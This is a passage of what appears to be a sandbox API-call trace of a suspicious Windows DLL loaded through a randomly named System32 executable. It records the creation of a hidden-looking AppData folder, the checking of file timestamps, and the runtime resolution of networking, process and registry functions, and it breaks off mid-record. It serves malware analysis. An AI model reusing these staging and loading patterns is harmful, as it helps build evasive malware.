SetLastError (dwErrCode=0x0) [0030.934] GetLastError () returned 0x0 [0030.934] SetLastError (dwErrCode=0x0) [0030.934] GetLastError () returned 0x0 [0030.935] SetLastError (dwErrCode=0x0) [0030.935] GetLastError () returned 0x0 [0030.935] SetLastError (dwErrCode=0x0) [0030.935] GetLastError () returned 0x0 [0030.935] SetLastError (dwErrCode=0x0) [0030.935] GetLastError () returned 0x0 [0030.935] SetLastError (dwErrCode=0x0) [0030.935] GetLastError () returned 0x0 [0030.935] SetLastError (dwErrCode=0x0) [0030.935] GetLastError () returned 0x0 [0030.935] SetLastError (dwErrCode=0x0) [0030.935] GetLastError () returned 0x0 [0030.935] SetLastError (dwErrCode=0x0) [0030.935] GetLastError () returned 0x0 [0030.935] SetLastError (dwErrCode=0x0) [0030.935] GetLastError () returned 0x0 [0030.935] SetLastError (dwErrCode=0x0) [0030.935] GetLastError () returned 0x0 [0030.935] SetLastError (dwErrCode=0x0) [0030.935] GetLastError () returned 0x0 [0030.935] SetLastError (dwErrCode=0x0) [0030.935] GetLastError () returned 0x0 [0030.935] SetLastError (dwErrCode=0x0) [0030.935] GetLastError () returned 0x0 [0030.935] SetLastError (dwErrCode=0x0) [0030.935] GetLastError () returned 0x0 [0030.935] SetLastError (dwErrCode=0x0) [0030.936] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0030.936] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0030.936] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0030.937] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f560 | out: lpSystemTimeAsFileTime=0x26f560*(dwLowDateTime=0xe02a5490, dwHighDateTime=0x1d3dfba)) [0030.938] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f498, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.938] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f380, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.938] GetLastError () returned 0x0 [0030.939] GetLastError () returned 0x0 [0030.939] GetSystemDirectoryA (in: lpBuffer=0x72e0e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0030.939] wsprintfA (in: param_1=0x72e0e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0030.939] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72e0e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.939] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72e0e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.939] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72e0e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.939] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72e0e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0030.939] wsprintfA (in: param_1=0x72e0e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0030.939] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0030.939] wsprintfA (in: param_1=0x72e0e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0030.939] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0030.939] GetLastError () returned 0xb7 [0030.939] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72e0e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0030.939] wsprintfA (in: param_1=0x72e0e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0030.939] wsprintfA (in: param_1=0x72e0e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0030.939] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72e0e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0030.939] wsprintfA (in: param_1=0x26f200, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0030.939] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0030.940] wsprintfA (in: param_1=0x26f0fc, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0030.940] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0030.940] GetFileTime (in: hFile=0x74, lpCreationTime=0x72e0ec68, lpLastAccessTime=0x72e0ec70, lpLastWriteTime=0x72e0ec78 | out: lpCreationTime=0x72e0ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72e0ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72e0ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0030.940] CloseHandle (hObject=0x74) returned 1 [0030.940] GetLastError () returned 0x0 [0030.940] wsprintfA (in: param_1=0x72e0ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0030.940] GetLastError () returned 0x0 [0030.940] wsprintfA (in: param_1=0x72e0eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0030.940] GetSystemDirectoryA (in: lpBuffer=0x26f200, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0030.940] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0030.940] GetFileTime (in: hFile=0x74, lpCreationTime=0x72e1012c, lpLastAccessTime=0x72e10134, lpLastWriteTime=0x72e1013c | out: lpCreationTime=0x72e1012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72e10134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72e1013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0030.940] CloseHandle (hObject=0x74) returned 1 [0030.940] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0030.941] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0030.941] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0030.942] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0030.942] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0030.942] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0030.942] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0030.942] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0030.942] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0030.942] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0030.942] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0030.942] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0030.942] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0030.943] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0030.944] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0030.944] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0030.944] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0030.944] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0030.944] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0030.944] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0030.944] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0030.944] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0030.944] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0030.944] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0030.944] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0030.944] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0030.944] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0030.944] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0030.944] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0030.944] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0030.944] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0030.944] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0030.944] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0030.945] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0030.945] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0030.945] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0030.945] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0030.945] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0030.945] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0030.945] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0030.945] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0030.945] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0030.945] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0030.945] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0030.945] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0030.945] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0030.945] GetModuleFileNameA (in: hModule=0x72dd0000, lpFilename=0x72e0e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0030.945] GetModuleFileNameW (in: hModule=0x72dd0000, lpFilename=0x72e0e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0030.945] GetModuleFileNameA (in: hModule=0x72dd0000, lpFilename=0x72e0e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0030.945] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0030.984] HeapDestroy (hHeap=0x140000) returned 1 Process: id = "6" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f700" os_pid = "0xa90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 391 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 392 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 393 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 394 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 395 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 396 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 397 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 398 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 399 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 400 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 401 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 402 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 403 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 404 start_va = 0x6b0000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 405 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 406 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 407 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 408 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 409 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 410 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 411 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 412 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 413 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 414 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 415 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 416 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 417 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 418 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 419 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 420 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 421 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 422 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 423 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 424 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 425 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 426 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 427 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 428 start_va = 0x6c0000 end_va = 0x8bffff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 429 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 430 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 431 start_va = 0x6c0000 end_va = 0x88ffff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 432 start_va = 0x8b0000 end_va = 0x8bffff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 433 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 434 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 435 start_va = 0x8c0000 end_va = 0x9bffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 436 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 16 os_tid = 0xa94 [0031.059] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f714 | out: lpSystemTimeAsFileTime=0x22f714*(dwLowDateTime=0xe03d5f90, dwHighDateTime=0x1d3dfba)) [0031.059] GetCurrentProcessId () returned 0xa90 [0031.059] GetCurrentThreadId () returned 0xa94 [0031.059] GetTickCount () returned 0x16ee8 [0031.059] QueryPerformanceCounter (in: lpPerformanceCount=0x22f70c | out: lpPerformanceCount=0x22f70c*=358968754) returned 1 [0031.060] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.060] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0031.060] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0031.060] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0031.060] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0031.060] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.060] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.061] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.061] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.061] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.061] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.061] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.061] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.061] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.061] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.061] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.061] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.061] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.061] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.062] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.062] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.062] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.062] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.062] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.062] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.062] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.062] GetCurrentThreadId () returned 0xa94 [0031.062] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer" [0031.062] GetEnvironmentStringsW () returned 0x3f78a8* [0031.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0031.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x8b09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0031.062] FreeEnvironmentStringsW (penv=0x3f78a8) returned 1 [0031.062] GetStartupInfoA (in: lpStartupInfo=0x22f664 | out: lpStartupInfo=0x22f664*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0031.063] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0031.063] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0031.063] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0031.063] SetHandleCount (uNumber=0x20) returned 0x20 [0031.063] GetLastError () returned 0x0 [0031.063] SetLastError (dwErrCode=0x0) [0031.063] GetLastError () returned 